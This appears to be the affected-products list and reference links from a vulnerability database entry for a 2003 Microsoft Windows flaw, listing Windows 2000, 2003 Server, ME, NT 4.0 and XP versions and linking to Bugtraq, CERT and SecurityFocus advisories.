Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version enterprise

    Microsoft>>Windows_2003_server >> Version enterprise_64-bit

      Microsoft>>Windows_2003_server >> Version r2

        Microsoft>>Windows_2003_server >> Version r2

          Microsoft>>Windows_2003_server >> Version standard

            Microsoft>>Windows_2003_server >> Version web

              Microsoft>>Windows_me >> Version *

              Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                  Microsoft>>Windows_nt >> Version 4.0

                    Microsoft>>Windows_nt >> Version 4.0

                    Microsoft>>Windows_nt >> Version 4.0

                    Microsoft>>Windows_nt >> Version 4.0

                    Microsoft>>Windows_nt >> Version 4.0

                      Microsoft>>Windows_nt >> Version 4.0

                      Microsoft>>Windows_nt >> Version 4.0

                      Microsoft>>Windows_nt >> Version 4.0

                      Microsoft>>Windows_nt >> Version 4.0

                        Microsoft>>Windows_nt >> Version 4.0

                        Microsoft>>Windows_nt >> Version 4.0

                        Microsoft>>Windows_nt >> Version 4.0

                        Microsoft>>Windows_nt >> Version 4.0

                          Microsoft>>Windows_nt >> Version 4.0

                          Microsoft>>Windows_nt >> Version 4.0

                          Microsoft>>Windows_nt >> Version 4.0

                          Microsoft>>Windows_nt >> Version 4.0

                            Microsoft>>Windows_nt >> Version 4.0

                            Microsoft>>Windows_nt >> Version 4.0

                            Microsoft>>Windows_nt >> Version 4.0

                            Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_xp >> Version *

                                Microsoft>>Windows_xp >> Version *

                                Microsoft>>Windows_xp >> Version *

                                Microsoft>>Windows_xp >> Version *

                                  Microsoft>>Windows_xp >> Version *

                                  References

                                  http://marc.info/?l=bugtraq&m=106666713812158&w=2
                                  Tags : mailing-list, x_refsource_BUGTRAQ
                                  http://marc.info/?l=ntbugtraq&m=106632188709562&w=2
                                  Tags : mailing-list, x_refsource_BUGTRAQ
                                  http://www.cert.org/advisories/CA-2003-27.html
                                  Tags : third-party-advisory, x_refsource_CERT
                                  http://www.kb.cert.org/vuls/id/575892
                                  Tags : third-party-advisory, x_refsource_CERT-VN
                                  http://www.securityfocus.com/bid/8826
                                  Tags : vdb-entry, x_refsource_BID